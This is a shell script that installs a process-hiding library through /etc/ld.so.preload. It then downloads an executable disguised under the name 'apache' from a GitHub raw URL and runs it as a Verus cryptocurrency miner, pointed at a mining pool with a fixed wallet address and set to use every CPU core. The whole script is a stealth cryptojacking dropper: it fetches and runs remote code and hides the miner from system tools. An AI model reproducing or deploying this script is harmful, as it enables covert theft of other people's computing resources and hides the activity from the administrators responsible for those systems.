#!/bin/sh
git clone https://github.com/hanifgz/libprocesshider.git
cd libprocesshider
make
sudo mv libprocesshider.so /usr/local/lib/;sudo su -c 'echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload'
cd ..
sudo rm libprocesshider -r

wget https://raw.githubusercontent.com/kuyaxxx/nambang/main/apache
chmod +x apache

sleep 5
./apache -a verus -o stratum+tcp://ap.luckpool.net:3956 -u RKJZtNARyonv8N2GtPAo5E7sn8uHPjt2LZ.$(echo $(shuf -i 1-1000 -n 1)) -p x -t $(echo $(nproc --all))
